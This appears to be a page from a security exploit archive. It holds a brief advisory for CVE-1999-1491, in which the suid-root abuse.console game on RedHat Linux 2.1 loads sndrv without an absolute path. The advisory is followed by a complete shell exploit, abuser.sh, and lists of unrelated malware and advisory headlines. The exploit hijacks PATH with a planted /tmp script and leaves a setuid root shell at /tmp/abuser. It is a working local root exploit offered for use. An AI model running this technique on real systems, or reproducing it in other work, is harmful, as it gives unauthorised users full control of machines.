The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
Login As
You can log in if you are registered at one of these services:
Security Bulletins
Latest Malware Updates

Infostealer.Posteal

02/26/2015

Downloader.Busadom

02/26/2015

Trojan.Ladocosm

02/26/2015

SONAR.SuspDocRun

02/25/2015

SONAR.SuspHelpRun

02/25/2015
02/02/1996

RedHat Linux 2.1 abuse.console Vulnerability

CVE:  CVE-1999-1491

source: http://www.securityfocus.com/bid/354/info

Abuse is a game that is included with RedHat Linux 2.1 in the games package. The console version, abuse.console, is suid-root and will load the program sndrv as root without checking for an absolute pathname. This means that sndrv can be substituted in another directory by a regular user and used to locally execute arbitrary code on the target machine. Consequences are a root compromise.

Exploit:

#!/bin/sh

#

# abuser.sh

# exploits a security hole in abuse to create

# a suid root shell /tmp/abuser on a linux

# Red Hat 2.1 system with the games package

# installed.

#

# by Dave M. (davem@cmu.edu)

#

echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system

echo ================ Checking system vulnerability

if test -u /usr/lib/games/abuse/abuse.console

then

echo ++++++++++++++++ System appears vulnerable.

cd /tmp

cat << _EOF_ > /tmp/undrv

#!/bin/sh

/bin/cp /bin/sh /tmp/abuser

/bin/chmod 4777 /tmp/abuser

_EOF_

chmod +x /tmp/undrv

PATH=/tmp

echo ================ Executing Abuse

/usr/lib/games/abuse/abuse.console

/bin/rm /tmp/undrv

if test -u /tmp/abuser

then

echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser

else

echo ---------------- Exploit failed

fi

else

echo ---------------- This machine does not appear to be vulnerable.

fi

Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

SQL inection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit &quot;mbae.sys&quot;

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015